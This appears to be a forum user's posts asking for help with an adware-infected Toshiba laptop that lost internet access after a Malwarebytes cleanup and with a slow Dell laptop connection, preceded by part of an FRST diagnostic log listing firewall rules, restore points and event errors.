==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe FirewallRules: [{EFE7CF45-1DAA-444A-9D68-63305F72B7B9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PowerCinema.exe FirewallRules: [{80374A2A-F190-4E76-B229-C33B434E33CC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMService.exe FirewallRules: [{1B9C4756-D936-4A65-8F71-23B96B9920E7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMP\CLBrowserEngine.exe FirewallRules: [{A249412C-65ED-478F-A265-730F2670C0CB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMS\CLMSService.exe FirewallRules: [{B7258A50-52F6-4718-AA9D-F64826CF7940}] => (Allow) LPort=80 FirewallRules: [{783ED446-2EB5-4D16-AA1E-E2891F07EE59}] => (Allow) LPort=80 FirewallRules: [{70403FF4-1D67-4D9B-B897-BA6F806EACA6}] => (Allow) LPort=80 FirewallRules: [{D2221019-1105-4A94-89C3-3937E8375ED2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{2C84BC51-F1B7-4BAB-ADBF-0543D8DF3E29}] => (Allow) LPort=2869 FirewallRules: [{D84264C9-3FEF-42B5-8D9F-11A47526CF13}] => (Allow) LPort=1900 FirewallRules: 
[{789E738D-DA66-4A05-B263-F7D8AFE251B2}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{9395CA26-0EC4-458B-ACD7-E1A49CC22B00}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe FirewallRules: [{B7B911B3-E1A8-4E65-AFA0-AFCF782744C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3F71D384-650E-4A4C-B0BE-0791DBAF9E52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{E8190506-4194-426F-9C00-B06D1C8072CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{FF7A96AF-877F-41DF-B6A7-A5490ECE3775}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Restore Points ========================= 06-09-2015 10:16:38 Windows Update 09-09-2015 11:00:57 Windows Update 10-09-2015 18:07:18 Windows Update 15-09-2015 07:55:18 Windows Update 18-09-2015 17:16:42 Windows Update 22-09-2015 14:11:34 Windows Update 26-09-2015 09:52:55 Windows Update 30-09-2015 10:34:26 Windows Update 03-10-2015 14:53:55 Windows Update 07-10-2015 17:52:14 Windows Update 11-10-2015 19:12:09 Windows Update 14-10-2015 19:51:23 Windows Update 15-10-2015 09:28:46 Windows Update 19-10-2015 11:40:48 Windows Update 22-10-2015 17:02:18 Windows Update 29-10-2015 19:01:20 Windows Update 03-11-2015 10:52:06 Windows Update 08-11-2015 11:52:57 Windows Update 12-11-2015 20:50:58 Windows Update 12-11-2015 21:46:25 Windows Update 16-11-2015 15:08:37 Windows Update 20-11-2015 19:26:46 Windows Update 27-11-2015 19:04:56 Windows Update 01-12-2015 12:15:00 Windows Update 04-12-2015 15:03:04 Windows Update 11-12-2015 12:52:52 Windows Update 14-12-2015 12:24:39 Windows Update 17-12-2015 18:42:37 Windows Update 26-12-2015 11:41:26 Windows Update 29-12-2015 21:04:35 Windows Update 03-01-2016 21:07:54 Windows Update 08-01-2016 18:16:31 Windows Update 16-01-2016 08:03:26 Windows Update 17-01-2016 11:42:08 Windows Update 21-01-2016 12:58:31 Windows Update 23-01-2016 
18:29:26 Removed Ask Toolbar. 23-01-2016 18:35:35 Removed SlimCleaner Plus ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (01/26/2016 02:58:19 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/24/2016 02:45:42 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/24/2016 02:39:15 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/23/2016 07:44:06 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 07:41:05 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 07:37:59 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (01/23/2016 07:36:49 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 06:31:13 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 06:28:04 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY) Description: 0x80072af9 Error: (01/23/2016 06:24:43 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: 
//./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 System errors: ============= Error: (01/24/2016 03:48:50 AM) (Source: ssidrv) (EventID: 26) (User: ) Description: Failed to set monitor event rule. Error: (01/24/2016 03:47:30 AM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: 30000Netman Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 115.31.0.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. 
New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY59 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\SYSTEM Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/24/2016 02:37:27 AM) (Source: ssidrv) (EventID: 26) (User: ) Description: Failed to set monitor event rule. Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 115.31.0.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. 
New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.213.3845.0 Update Source: %NT AUTHORITY51 Update Stage: 4.8.0204.00 Source Path: 4.8.0204.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\NETWORK SERVICE Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 CodeIntegrity: =================================== Date: 2016-01-26 03:07:09.097 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:08.847 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:08.629 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:08.395 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. 
Date: 2016-01-26 03:07:08.005 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:07.771 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:07.521 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:07:07.287 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:06:33.544 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system. Date: 2016-01-26 03:06:33.326 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system. 
==================== Memory info =========================== Processor: Intel® Core2 Duo CPU P7350 @ 2.00GHz Percentage of memory in use: 39% Total physical RAM: 4093.04 MB Available physical RAM: 2493.93 MB Total Virtual: 8361.36 MB Available Virtual: 6564.87 MB ==================== Drives ================================ Drive c: (TI100343V0F) (Fixed) (Total:454.05 GB) (Free:335.04 GB) NTFS ==>[drive with boot components (obtained from BCD)] Drive e: (FCCJ TROY) (Removable) (Total:0.99 GB) (Free:0.98 GB) FAT ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 008CB0AA) Partition 1: (Not Active) - (Size=1.5 GB) - (Type=27) Partition 2: (Active) - (Size=454.1 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=10.2 GB) - (Type=17) ======================================================== Disk: 1 (Size: 1010 MB) (Disk ID: 00661E17) Partition 1: (Active) - (Size=1010 MB) - (Type=06) ==================== End of Addition.txt ============================
  7. Sorry, forgot to mention, it's a Toshiba Satellite A505, Windows 7, running Webroot antivirus
  8. An elderly family member's PC was miserably slow, showing obvious signs of infection, programs such as ArcadeTwist, PremierOpinion, Slimware/Slimcleaner, OneSystemCare, among others. I downloaded, installed, and did a threat scan with the free version of Malwarebytes. It found over 2300 items, I attempted to quarantine them all, then something odd happened. Malwarebytes said "0 items successfully quarantined" and the finish button froze. So I restarted the PC, and now it shows all the items (I assume, I didn't count) in the quarantine, however the scan log from that scan shows nothing, zeros in every category. Now after that reboot, the PC cannot access the internet, despite showing a network connection, webpages cannot be accessed, neither through Firefox nor IE, Malwarebytes can't access servers to update, trying to "ping" google.com in command prompt doesn't work. Needless to say, I can't download any other scan tools. All help is appreciated, thank you.
  9. Yes, as I said in the original post, I never assumed it was an issue of Comcast not delivering what I paid for. And I understand WiFi will naturally be slower than Ethernet. But I don't understand why the notebook is the only device in the house that has such issues with internet speed. All the other devices are reasonably fast on the same WiFi, but the Dell notebook is practically unusable. I was hoping maybe there was something internally with the notebook, like some settings that needed to be adjusted, or something needed to be changed in the registry, etc. that I could do to make it a little faster. Is it actually normal for a 2.7gb file to take 14 hours to download?
  10. OK, I followed your instructions, here are the results: Ping: 35ms, download: 89.32 Mbps, upload: 4.37 Mbps
  11. Yes, all correct. It's Windows 7, 64-bit, and that's exactly what the WiFi router and the cable converter things look like.
  12. Sorry, the laptop itself just says "Inspiron", control panel says the model is N5110. It connects over WiFi. There are three TVs in the house, with cable modems (the front of the modem says "uDTA-p", and the model number says "DC50Xu". I'm not sure what the WiFi router is called other than "Xfinity 802.11n XB2"). None of the TVs actually connect to the internet. At most, the WiFi has one LG cell phone, a Samsung Galaxy tablet, a Microsoft Surface Pro 4, a Nintendo Wii, and the PC connected at any one time, and btw I have tried disconnecting all other devices from the WiFi; it doesn't help the slow connection on the PC at all. The 3 logs should be attached. Thank you. Addition.txt CheckResults.txt FRST.txt
  13. Hello, I was hoping the kind, brilliant people of this forum could help me with my PC's slow internet connection. I pay for 75 Mbps from my ISP (Comcast); however, a speed test from their own website gives me the results: IPv4: ping = 11ms, download = 36.39 Mbps, upload = 11.79 Mbps. IPv6: ping = 12ms, download = 44.68 Mbps, upload = 2.78 Mbps. Also, watching/streaming videos is very frustrating and laggy, webpages take several minutes to load, and games that run without problems on singleplayer are unplayable online. I'm pretty sure the issue is with my PC, not the ISP or the router, since other devices don't seem so slow. I don't really think it's a malware issue, but I can never say for sure. It's a 3-4 year old Dell Inspiron laptop. I run Trend Micro Titanium antivirus and Malwarebytes home premium. Any help is much appreciated, thanks.